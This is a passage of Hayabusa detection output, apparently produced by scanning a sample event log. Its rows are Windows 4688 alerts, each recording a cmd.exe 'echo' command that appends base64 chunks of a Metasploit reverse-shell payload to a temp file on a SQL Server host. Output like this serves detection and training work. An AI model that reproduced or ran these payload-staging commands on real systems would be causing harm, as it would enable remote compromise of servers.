jAAAAFb/FcjBhACJRSyNW/hpTeyNVdyJReyJXfCJTeiJVe1KBAyLSAzFGQ+EqBcQAIld/ItVHGo4EXjF2v//i/gzwIv3uQcAAF/zq4tFHItNDIt9/IkGi1EMiwRMi1UUUmoCi9BWiUks6HX9//+DZgyF23VDi0X0FMB0DVCLRRxQ>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x934 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.568 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo 6N3n/w6JRgSLGAiJJusxVv9DrMFA9jsUibkMdYWLNQvBQHX/KS/AdC//1pOkBYD8CgCUPuVdw4tTBMFWBIlzJItFDCBuBIveibv8Y0gugzwPAA+FW5j/Sl9e7+tbwlFdw5BVizeBOlQCAACLTThTVjP2iwGLUQSJRfSLRRBXiXXsigCJ5eOEwCF14Ilk8Il12IlV3A+EhwoAAIuHUjzHdDwqRfSFwHQtO6HccvkIfQxXiQf/VQiDxASFwA+LlAoAAItPBAF7iU3ci1VGQIlF9IoKiEj//0Wp6awKdQDjfT+LDXXBQAC4AQDQADMqJDkBiUW8/0XAiVXIiVXEiVXUxkVbIIpV+4kEiJISihdqXFL/FWgNRniDxKsz0ushi8R4wUAAM8DIB4sJigQ3g4wCO8KhmMmQAAC5rQAAAIoHPC11BjhVwI/r9DwrdQYecsRH6+o8I3UGiYXUR+sthyCuButNyEfr1jwwdQaITd9H68yhdMFAAIl9EAcIfhQzyb0Eig+z/xVowUAAg8QIM1U/EosNCcEIAH3AigeLCYoEQYPgBGeQdF0Pvg+D6TBHieQQixV0wUAA8E3ggzoBfhUzwGoEigdQ/xVo0Tr9i03gMsQI6xGheIvKQzPSiheLAIpu18XgBEzSO8J0Ig8yb48MiRKNTErQ67mJfRDHcDIBUwC56yaAPip1HosDmcNRRzvCiX0Qx0XMAQAAhn0FfJzA99iJRQuKA4ngzFTsLg+F0QAAAKF0O0AAR7hF5AEAAACJXxCDODJ+1TPJKgSKD1H/FWjBQPSDXQjC0uuQiw14wUAAM8CKB4sJigRBg+AEO2N0Tw8TD/npMEeJd5+L+HTBQACJTfCDOk5+FTPAagSKB1D/Fce1QACLTfCDxFTrEaFmwUAAM9IZe4sAigRQ0bUEhcB0JbG+h40MiUeNTErQ67uAPyp1NosDg8MERzPJO8IPnClJI8iJTfCJFRBqA2hU9EA6V/8VNMFAAIPE84XAdMWKBzxxdYf4O0frMYlVBOvbiVXuylV+69M8bHUIuAEAAB9H6xg8aHUruAIAAABN6wzomgCqAGYIM8CDxwOJmRCLVZLgwg+++YM8eA953Vm4NjPSipcEfECz3CSV6HtAAIXAViKLSwSNVfyRA1Iwyqxvw5hSjVXQUmoBUVBFcg3NAIPEGOuOg/iW9xCD+AL+C4Py6DPhZotD/OsFiwODwwSNTfyNVaxRRk3QUlFqAVCJcNjo3AwA24PJFIuPi0XkD8CWxrs4ewCLRV6eUAGB+gC2AAByarj/AQAAOUX8D4POAwAATsYGJIvm/EE7yB4x/HITc4sDAACFvHUii0sEjVU9iwNSjVUfg8MIUo1V0FJqP1FQ6HEMAAArxBjrMYP4AXQNg/hadQgPvwODwwQWBSQDQcObik38jRis+FdN0FJRaldQiUWX6EgMAACDiBSLkYtF5IXAdCezRbSNUOiB+gACAADH>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb3c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:16.841 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Bcz/AUgAOUX8cw9OOQbdi038QTvIiY3ncvGLRdCFwJyE/QEAAMpF+w/p1N2UAIXA0x+LUwSLA411/IPDCAGNdbpWUWoDUi8ZoUMAAINaS+sug/gtdBA1+AJ1C4PDBDPAZos2/OsFiwP1w0SNVfxSjVWsUlFqMavoU6AAAIPEFD1Ki0XkhcB0J2JF8I1I00j5AOwAAHIFuP8BgQAWdcpzD07GBu2LTfxBO8aJz/xy8YtF1IXAD4RkAu1ogD4wD4RbAgAATsYGMOlLNwAAhcB1qYtTBLYDjXX8g8MIVhp1UVZRagRSUOg1EAAAg8QY6y6DpAF0EIP4AnULg8MEM8D4i9D86wWLAwa7BI0N/FKNVaxgUWoEUOg5NgBmg8Sxi/D4ReSFoXQNi0XwH0gBgfkAAs1TcgVQ/wEAADnqhXMPTsYGMIsv/EHjyIklA3Lxi0XUhcAPgsYBAACLRdhoDQ+EuwEABItVIE5OilGIRgHGBs2LRZGD3QJYoAHlRYszg8MEhXYPpsgDAAAgReSFwHUYV/6Dyf8zwMZFF6XyrvfRSYlN/Ol3AQAAi7TwM9KUyYvGiVWWD4ajAwAAgDgAD7qaA5kAQEI70YlVmrbuxkUXIOlKAQCM3QOLReTowwjdXbSFwLgGPpsAdEW3RfCNVfxSjdet/f//Uo1k0FKLfLhQi0XUUH9FQJpQUeiiMwAAi5yLRaqDxCCFwHQ8xkX7LengAAAAi0XEhcB0CcZF+yvp0IKT+O5FPIUSD4ThAAwAxkU1INm8AAAAi2LkhYtjQLgGAAACNxZFRfCFwHUIuAEAAACJRfCdTcSNla2Nlf84A1GDwwhSUPbsCN0cJOjgBQA2i/CD7BSAJi11B8ZFeS2q6xiKRSp4wHQGxkX7K+sLi0Ughed0BFAAcSAE/oPJGzbA766LRdT3iEmFwIlN/GIiky7X/xV8EkAAg8QIhcB1EotF/MYEfy6LRfxAokX8xgQwAPTZEGI5R3UTamXt/xV8wUCEg/EIhcCiA8YARYoh+4TAdByB/vrCQABOFNtFBzvwdA0NZ/sjiA6pRfxAiUX8i0XMhcAP3AEDAACDfcCcD4X3AgAAi1Xgi/0YO4cPfukCABOAfRcwD4V+AgC2ikVfhMAPhI6pABicRXuLfQyFwHRoO2fccnZXiQf/VQjCxASbwBTmjAMAAItPBIuaQ9jckxaIEJKJRfSLVeyLTeBC5IlV7ItV/NfkhlX8jkPg0kkCAACKQoPDBIhz6o116sdF/GgAAADLRRcg6f7/9f/GkOoljXXqx+n8AQAAAMZFNSDpS///w4PDBIXAdU2LReyLS/yZiQHHY7wAAAApiVEESNn///8g+EB1aItT/ItF7MdFvAAAg9WJAukT////g/gCdRaLS/xmi1Xsx0W8AAAAAGaJEen4/v+pi0P8i03sx0UGAAAAgsoI6eT+CP+L/K2xiUUQigBQsciD+XQPh2OLAAAzwtKR>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa98 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.115 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo pHyqCv8klYB8QNqLA41N/ElsBI1VrFFSanhqBFDoWgyocxrEd4vwxoEXIOmb/s//iwODw3CFwA+EwADpAMxN/I1VrFFSUOhRCQAAi/CLReQptQyFwA+ErgAAAItF8ItN7jvBD7OgKQAAiUX8xkUXIOlW/v//iwODkMeFwHR/jU0tjThqUVtQ6IAIAADrvYvhg8MEhcB074sQxI2s/f//aP8eAABRUughDQA+oPCDyf+m/jNA5wVy0UnGRRcgiU1l6eX+Nv+LmIPDBIWddC+NTfyN1axgUlDoUJEAAOlqUf//IAN7wwScwHQTjQb8jVWs+VJQ6FTdAPnpTv///76gwkAAx0X8uQAAAMZwFyDphv3//4OWBDxCdQuLQwKFwHSs09+0bzwOdfGLS/yFyWgHd7RcSQTrBPTA9smNVdJSpFC+52f//4vwg8n/i/5HwPKu99FJxkUXIIns/Ols/f9J/kj0QABu7w0IAAAAxkX7AIMC4+lU/f+uxkUjsoj964116n1F5wIAXgDGjnZN6Qrm//+LfWaLRfSFwHTxO0XcchlXiXL/HkJExASQwA+F/gAAAItPBMgHiU1WilUXiBAPiUX0i03si1X8QejS7BBNckkvyp1Ng3fAixn26fgBiyv0dUoGJvyF/5RDhcB0NDvpRXInfUUIi00nUIkIIVUIg8QEhcB0hdUVAACLRQyLEItABIlF3IlV9C0Zig6ICIdLRfSLTTxBRk+JTex1vYtNioXJdFiLTcCFyZhRi1Xgi038O9GVR4XAdB+8RdxyIIt9DItFiVeJB/9VCIPEBIXAdU+LD01XBIlN9IlV3IvBik0uiBJAiUUBiz/zi1X86+FN7LFN4Ek7yolN4He5/0UQ7VUQinCECw+FXPX//4tNDHVF9F+JAYtF7F5bi+VdwhAAX16DyP9bi+VdwhAAkKJ7QAB9eHoAlXZAAE93QACNAUAAYnhABlR0QACUeEAA7+lAuft4QAA9dkAA6HNAANh6QAAAfQwMIAzGDAwMDAwMDAwMDBcMDAwMDAwM8Aw8DHkMDAzNyQwMAYQMuFUM4AwMDAwMDAxRDAyMDAxqkQyhDAwMDCMM/VoCDAMMDAwMDAwMDAwMDD0MDAwMBAwM/QwMDAwMDAwFBmYCSQwGDAwMDAcICQwMCgwLDAy2jUkAontAAIl5QN4mekAARHlAANl5QJGieUAAjHmDAPV5QABzekAAAAgICAiHMwjgCAgIOQgICAgICAgZCAgICAgICAgICAg/wggICAgIHggkCAjj6ggIR+4nCAgICHUICAgICAhjCAgBAggICAIhCOoICAh9CAgICC0CBAgICAgIQlKnCAgICAgICAgICGwICAgICAXwCAYICQh5kJCQkJCQkFWL7IPsWFbORX1XS30QjU38UItFDI1VBlGLTQhSWFB66CMBAACaTYSLORSDxBiJR/iFyYuddAbGAnLmcgFQT/9Ts8l+D4A8>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb24 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.389 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo ATB1Bk+chcl/9Il9EEldDIXbD4znAAAAi8srz4P5BA+PsAAAAIXbfzuAODB0BMYTLquF230u/8u4rzAViffZiU0Mi9GLPR2NAvOri8oe4QNOqot9EBHCi1UU1dgD8ItF+IldDLkBe/oAOyF8EooQiBZGQG3LSe7GnQ5GQTvPOu2LVRQ7un0iK9+ZMDAwMItgiyyL0cEvAmSGi8qD4b8Da5GqSwYwi1UURopG/1s8pw+FlwAAAP06GIXA8l8PhYwA7gBzRv/sX1GL5V3Kg/v9D41Q///uS0aJXQySEIhWDkDGui5Gg/8BfgpPigiIDjJ+T3X3xuplRrjbfb7328YGLXkDxgYrc8O5ZAAAMqP3+UaFwIv6fgUEMIgGRovDuQreAABi9/mFGyfKfs64Z2ZmZvfvwfoCi8LB1h8D0J3CMIgjTIDqMIgO6Rb//9uLwsYGANnQi+VdHZCQVYvsi0Uci00Yi/0UUItFEGoBUYtNDFKLVQhQUVLoDgDupYPEHF3DkJCQkJCQkOIkVYvsg+wUg30QT3wHx0UQXAAAAN1GCNwdMNxAAItNGFOLXfdWM/YMA+CJdfyJMfbEBYv7Yg7dRQjZ4N1dCMcBAQBfACFNDItVCH/j7FBRUiEVGMFAAN1dCN1F7NwdMMIRAIPEDN/g9sREe3KNc1A7PXZYFEXs3B0wwkAAWeD2xERMSFDd7NwNEMNAAI3m7N+D7AjdHCT/FRjBQAC1XfTdRfTcBQjDQACDxAxO3A0Aw0A36No1AADqNp+xMCrIiA6LTfxB5PMtTfx3qI1D9zvw2qyKFogXR0Y78HIG61DdRQjcHXfCUADf4CUZQQAAdcHdx33cDa/CQADdVawXwNwdKPucAIng9sTkeiHdVeMuDfjCQEsL2cDcHSjCQADf4PbEBXum3V30iVz86wLdUotY9Y00GItFHIXAdW0DdfwdTRTF83Pri0UQiPfYiQHGAwCLKV5b+uXuwyEb/GT+iRF3PN1FCI3XUDv4czBPDfjCQACNY/RQg+wIvv8k/xUYwZkA3UVGg4AM6AU1AACLTRSLXcsEMIgHRzv+dsndZyZTUCuncg2YxkNPAIvwXltGxV3DghZ8bYC9bIBOOYgWfs6LVRE7gsYGPMYFTv5s677GBjGLzkeF0on6dQg7w3YDxgA2QGM+MH8zxgBEX4vDXluL5dPDkJCQkJCQkJBjkJCQkJBVi+yLRQyLMUVTVleLfRSrwPL3dDOLRRDHAAAWAADrEov9EDPAhckPnMCFYokCdAL32arNzMzMs41R4cHqA4rCTpjrS8iAwWycDgukhdJ1LYtFGDX+iTiWxl9eW13DkJBVi+yLRQyLVRDGi112V4v0GIXAdw1y9IP7/3cEbcl1IWpnFzR8CIH7////aHcqCfj/fLR/CIH7AACtgHIbhcmOG4ueHF9VFFBXUmRT6ML/He+DxMhfWyLDhcl0C+9NFMcBAJ8m3iwjhcB/>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x43c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.664 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo DXzUJz5zB7kBAAAA65kzs4vNFIUFifR0B/fbg9AA99hWagBqClB26KQ2AO5YyIvyisGyCvbqKncEgMMwi8bcH4vZjj502+BFxYtNHG3HXokBi8dfW13DkN+QsiKQjJDXkJCQkNOQVYvsUYtFCFOHiwhR/xWwwRMAi3UMi9j9VQiNRQxSi8tWUEzh/yEAAGoBUYld/Ojh/v//SI1VCFJQxgAKjUUMM8mbis9qAVHohP7//0iNVQhSUMYAhI1FDDPJUIpNimoBUQSa/hH/SExVCFJQxgAujUUMjhgBwesYU+ge/lX/i00Qg8RQtvCJ8F5bi+W8w5CQVYvsg+xWU1aNRfy5i9apUIupCI1N+DPSV2YkUAxRagFS6Br+/4eZ2ItFCIPEFEsUyJD+///GCsOLSLlgRXjolOr//5LAbzmLHhBLK/uLw8ZqP4k6X15bi+Xzw0T+g8nZzv/yrvfRSSvZi8ET+8HpAoalpguLGgyD4QMrw8iki2UQX16JAYvDW3blXcOQkJCQVTrsnps8i4QIi1UMUYsAVk0IUlFqAVDof/3//yLEFD3DkAtqkJCQIJCQkJCQkJCQVYvsgxNcXCwIUwyLdSBXiyP0PGZ1HItNHI1FpFCLRRCNVRhRDk0MUleCUVjAAQAA63aLRRyNNqRSjU0YUItCbI20C1GLTQxSUFEJAfv/OosVl8FVAIvYg1wHPDoBfhUzwGgDFeEAigNQ/xV4wUAAg8QIhRV6FXjBQAAzG4oLiwJmi2BIJQMBAEaFwPKei/uDyf8zwIpVJPKui0Ugi/P40UmL+IkKQYvRwekC56WLyoPhYPOk2j8cX15bwgEAAAAAi+Vdw4pVo4D+LXVskUUYhcDeQYt1IMYGMEaF/35NjAYuK4XAfRf32EzIiUUci7EiMA4wMIv+wekCGLOlyk3JA/OqFEUYi8qKaC8D8QPBQIlFGOs/SEaJRRiKC+dOakOFwH/xSIX/iewYfwSLiySFyXa4xlsuRgsbi3Xjiq+IBkYShf9/v4tFFIWfdATGBi5Gi0WaXQuEyXQLiA6KSwFGQ4TWdfWA+mZ0aNcfRl6JGRh0U425HI1VgVGNTQhSLWoUW+j6+///iwanocQUi02HhdsPlcJGg/nfjYQSK4i4C3U2xgYwRgXmhcl0QYoQiBZGQAx199FFIItN5CtLX4k8+1sW5YvDxgYrRsYGMHTG4jBGi0Ugi00kK/Bfia1IHFvlXcOQkJCQeJCQkJACkJBqkFXG7ItFHItNyZ5VFFqLRZVqAFGLTQxSi1UIUFFS6G75//+D5hxdw7CQ5ZCQXZCo7FWLI1NWV4B9DL4BAAAAIM+LRRpMvMJAwdPmik2TToACWHQFuyERQACLVQiLzkgjyooMGYiyi3DT6oXSdUeLTRSLVRhSbF9eqgr8XUGQkJCQVcPsi00QU+fJRRR1v78AAACLdRi75MJAANPnTzxYdPC70MJAAItVDItFCKvS>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb54 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:17.939 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo /LSvBYP4/x8bi1UcUovQGFKLVRRSUVDo6Av//4N6FF9eW2Hqi8hOI8+KDBmIDktNEOgdMgAAi8gLynXorEUY/FUcK8ZfqAKLxuVbXa6QoJCQkJBVi4KLTRCLRWWLVQzEyQBSaiJqBFDoFv///4PEFClKkFWL8YPsCFaLdQy3KnUIiXX4iXX86w2LRQiJ3/iNREb/iUX8rVUQjZgUUY0LjVRQaNCGQO3oxJyp/4X2dAZ+TfjGAQCD+P91A/l6/16LRF3Dg8j/w5C3eeiQkJCQkJCQhPuLvYtFCD0gURUAfRWLTRCLVUFR71DohQMA9oPEDF3CDAA9wNSMAH0bUOiRWAAAI00MUIus0lC0SWMApwCXxBBdwqzEPdY5CgCYnItVkotFDGhU+RQAUrroQwAAAIPEDF1hDAA9gD0KAH0Zi00QiwUMaFT5QABRUigjAIUAg8QMXcIMAItNDPOAnwL/FYswEFBR5VkCAACDxAxdwgwAkJBVi+yLRQxXTRBWi3UIUFFWkbsdAADsxl4qw5CQkHmQkFVE7It/GD1xEQEAE4/DAAAAD9G2AJ7aBd5V/wN8+AAP5zcBAAD/JA0EiUAAuIQAQQBdQLhgAEEArZa4QABBGV3puLZuQb9dwyPk/0AAXcNhtP9AAF3DuIj/QAClw7is/0AAXRi4IP9AOF3luPD+fgBddua0/kDLXcO4jP5AAF3DuHz+QGNdw1RYB0AAXSe4LP6HN6jDuBA4QABdw6j0bEAKXc241P1AOF3DuKxeQABdw7hs/UDYXcO4PP1A/l3DuBz9QABdw7gM/UAAXcO4wPxAAF3TBY5O/v+D+BZ35/8qhWyJQAC4cPxAAF3DuEj8l6tdEZwg/NgAXcPM8PtAEV3DuLxCQABd2YeXU9HNXcO4YPu5wF3DuDj7rgBdw7gA+0AAXcO47DxAAF3DLLz6QABmF+SQ+kAAXYu4ZPpAAF3DuDT6QABdw7hB+UAAXcO4tPlAAF3D2Jz5QABdw7iV+VMAXcOQzIdAAPyIQLfTh0AA2mZBAHf3QADoh1tR7w5AAPaeEwD9h8+TBIhA3guIQADliEAAYIhA/SKIFNcniEAALohAAIWIyAAgiEAANYiIANeIQAATiEAASohAAJcLzgBYiEAA/Igap1+IqgOFiEAAjIVAAJOIQACaiED0oYhAj6iIQACviEDx/IhAAJ2IjwDniEAAtohAAL1gQADwiEAAy4j2APyIQAD8iEwA/IhAANKIQADZiGUA4IhAADWIQADuiEDQ9YhTqZCQkJCQkJCQMYtksotdDKzMdQhXi33NaqlTVmgABHYACRsAaAASAAD/FZTA8gCFwHX+QQ2Kw0DRhakMWzk8xRjDQAB0DosmxQ3DQIIshcmL6+tEiwTFHMNAAFNQPHYmGwDai/6DyawzifKu9/BJi8Ewq4VwrDGKXjD/uK/5DXQFgPkedQTGBEgga8B16YvG6F5pXfyLfStX>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3ec | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:18.213 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo aKjBQRxTNujd/P//g84Q98ZfXltdw5CQkJCQkOWQkJBVi+yZRUBQ/xXkwUAAg8QEhbd0E4tNEIsdIFBRUuj0////g8QMXWOLRRAuTQxoVPlArzZR6Mf4//+DxAxdw5BRVYvsg+zOi5smVr51EInr+ItNF2oAiwZgAI1V/IlF9GoAUpHXBC5F9L8BUFKxRfwAAAAA/xWYwUAAHOD/tHdXiz3YwU4A/9dWwIQKiQZfXotXXcL+AP/Xxz4AAPoAXwWA/AoAXovlXcIoAIvk/JUGM8Aii+VdrQwAkJCQkJCLkJBVi+yD7BCLTQxWi9kQagCNVfixAEAvUotV7olF8I1F/IlN9FCLQgSNgfBqAVFQcUX81AAAz8dFJQC+AMYdFZTB8wDQ+JR1LFeLPd/BQL//14XAdQqJBl9ei4cI7QwA/ynHBgAgAABfBdfoCsdei+VdwgwAi0X8iQZe99gb0CVH7v7/BX4RAQCL5V1MWgCQkI9ViyRRiw8IjW4KUMR+ZgSAUQFF/B8AAEb/FbTBQHn0+P91HlaLNdjBQADX1oXAqgVei+Vdw/+889/8CgBeQOVUZzMb0OVdjZCQkJCOTJBVh1WL7FGLTQiN9ppQMH5mBDhRx0X8AQDvAP8VtMEqAIP4/28e54s12MFAAGaRhcB1c16L5V3D/9ZpgPwKAF7QK13DM8CLUCbDkJCQwJAGBZBdVaLsU4tdDFaLdQhXi30Oi8MLx3Upi06Di0YkC8gP3goBRwCLVgRS6NT///+DxASFzA9J9gAAAGLHrF3CDACFPA+MmwAAAH8ItJgPhqwAZgCwRiD+TiQLwXUUuE4EUej9/v//g8QEH8AG1ccAAACLViDO03X18EYkO9APhNqwAACLTRBqAGiLAwAAdVMwsBhPjCgAAItWBIsduMGcQEMEq2gGEIGCLP//0wAb5AsL04tG8WoEV18FEAAAaP//ABZQ/3OLfRCLXQyJlySJXiDFXjPAW13CiaiF/n9STwRu23MqYU4Ex0UI6QBwAFHob5//S4PEBIU9dT18Rh2LPdTBQADu1Qhq9QpoBhAAAGg4fgBDUP/XcFYEI00dagRRPXHK9gBo//9G5FL/14t9EAteIIl+ITMRX15bXcKUJ5CQkJBVi91Ri0UQM8lDwA+VwYlN/ItNDIP5QNVmXTVtAAAPhKgCYfBJg/kPzg4AAwAEcdIZkaKRQQD/JJX41kDWiy2tMgI/TvEP4QKA+XwPM8I7wnQvi04EjYn8apW7am3X//8ALlH/FezBQJCg+NAPikMCrgCLRRCFwCpGOIcODAKJKzgzwF7/5V3CDAAk/YlGM7XAXrHlo8IMW+4hCTPJi1Y4g3IEgPoED80BWK101IsZBDtV/L/ZUmoBaP//AABQ/xW4wUBNg/jCD4ToAZUXi0UQYsCLRjg2DgwEJJA4M8Bei0Jdwgw+JPv0RjgzwF6L5V3CDLSLrwgz0otOOIPhEJ95EA+U>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xb64 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:18.488 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo wjvCD4R1////CU6hgEX8asZQagRo/0EAFVH/ALjBQACD+P/768oBAACLRRAlwItGOCcODBAURt8zwF6L5V02mwAk74lGODPAXovlXcK0AIt1CPLJOkI4TOJ0gPoID1bBzchzhBb/sf+FwHQXiwhBUujS/P//g8QEhcB0G16L5V15DIuLRgRQ6JH8//+DxASFBNiFpQEAAItFEIWqi6quw+eTCIlGODPAXovlXQMM3iVOiUY4M8BeyOVdwgwAi3Vci044g98BFMmwfxvJQTtp0ISp/v//jVWbagRmiXcItkYEUmiAAAAAaP/gAAB+ZsdFCh4A/xW4DkAAg/j3D4SQAAAAi0UQhcCLRjh0DgwYiUY4M55ei+UWXgwAJP6JRjgzwF4l5V3CDACLVUyNTRBqBFGL9gRFARAAAGj//60AUP8VuMFAAIP4/w+CMP6+/+tigfkAQAAAf49qSwAADxjvAAAAgfknSAAAD4SNAADEgfkAAgAABoWxAAAAi46/M9KETjiB4QACAACx+dACAOaXlMI70A+E5f2q/4tOBI1FEGoEUGqFagZR/xW4wUAAg/j/dSGL59jBQAD/1oUadQdeZeVdwhvk/9YFxhgKAF6LB11CmwCLQBCFwBFEOHQPqswCiUY4M8Bei+VdwgwAqeT9iWI4Mwpei+VdwgwAi0UIXlVtapZSi0gEaAIQAEFt//8IwQf/orjBQACD+P8P/V39/7Try4H5AIAAAOAMuBbrAABei+9dwgwAfZxoLSBeiwJdwgwAi/9wj0AA7Y1AAEiOQAACjxgAo479Z96QQAAAAQUCBQUFAwXABQUFBQUEsovs2uwEX9EQi00MVldQjVUiUVLotdn/l4tFPItNCEG+CgCNAIoUhdjEAACNBBTYxEAAiFH/QEGKEIhR/4oXAYtV6IjYQY0ElbTEQADGAUtBABCIEYpQAUFAIRGKQAFBiAGLReSZ9/4dxgEgQQQwdMIwiAGLReBB3Y9Bmff+xgF8QQROjMIwiAGLZ9z5iBEqYcz+CgE6QQQwgMINiAGLRdhBiBFBmfdztQE6QQQwgMKRiAFBiBFBi1Xsv+gDAADGASBBqG9xmwAA/8aZ9//CZAAAxgQwiAG4H4U8UffXwfoFi8JBwegfA9CL9YDCMIgRQZmZ/7hnZuVm7ffqHIkCi+TBpR880IvGgMIwvgoADwCIEUGZ9/5egMIwBsCIEcZBAQCL5V3CDACGlpCQCZCQkFWL7FOLXRBWfIv78XU0M8CLdQjyrvd/gfn4AAAAiU1cjmuKU6SA+jp1oopDAhMvdAQ8XHUaaODsQQBW/3gQwlIAvEUMg8QIg+gEg8bR6zuKAzwvdAQ8XMA0gFYvdAUQ+lx1ioB7Ajp0JIPpAmjMAEEAVoPDAolNEP8VEAJA3FhFDIPECLWECIPGEIlFDI1FDI1NM1BWUVOstBYAAIXAdBs9eIlBAHXDX164FgC5AFtdw4tFEIXA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:18.764 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo dAruXrgmAAAAW13DZov6Z4XAdPdmPS8AdQWZxwZcgWaLeQL+xgJm/cB16TPAX/4hXfCQkJBzkJCQkFWL7FaLVwhXwP9RzAT/EISEAAUAikbChMD7CFbobx/eAIv4i0YYJQDTBAZ0Wj0AAAAGdRdqE/8VCMFA6oPEBGr/efSpFaTAQADrRowAAABedRdqAf8VCMFaAFeMBE3/1fX/FaRjQADrKD0AAHsCdaNqAP8VCMFAAIPEBGr/avb/FaTA+QDrVotGBFD/FXTdQEjBRgT/////i0YMhcB0FYtAEIXAdJ5Q/xV0wEAA80YQAAAAAIvHX15dw5CQMfYTkOug7LhBQAAN6M8kAABTi10QzVcz/8dFUI0AAAD2wwGJffx0B8dF/AAAAIB3wwJ0B4FND6IAAED3FwQAAAh0CcSbUYDMAYlF/FAN3L/9AIO5Hj0Ix0X4BwC/AIvDg+AEdmtww0B0B9EBAAAA6yKKbIDiPfbaG9KD4v6HwgTrD4rTgD4Q9tob0oPiAoPCA4vy9sNAdBKFwHVzX164DQAAAFuL5V3CMwD2xwF0Bb8AkhYE98MAIyAAdFmBzwAAIAD2ygP8gvfDDQAQAA5Pg/kerQaBzwD0AAL3wwAAQAB0ByZN/AAAAgD2VQJ0BoHPCgAAQIP5U3wH9sc+dAmAzyiBzwAAAEiLRUgkjfi///9laAAgAABR6FK9//+DxAzhwA+FkVMAt8hV+FBXVlCLo1M8jXr4Qf//UFH/FbDZQADrG4tV+ItV/ItNDGoAV1ZqAFK4Uf8VrMBAAIDnmsD4/4lFlXUgmDVtwEAA/9aFwA+ErAGzAP/Wb14FgPwKAFtPqPrCtACLVRjOYFLo1LT//4t1CIv4M4qLF7kYqQAA86tVfRiLT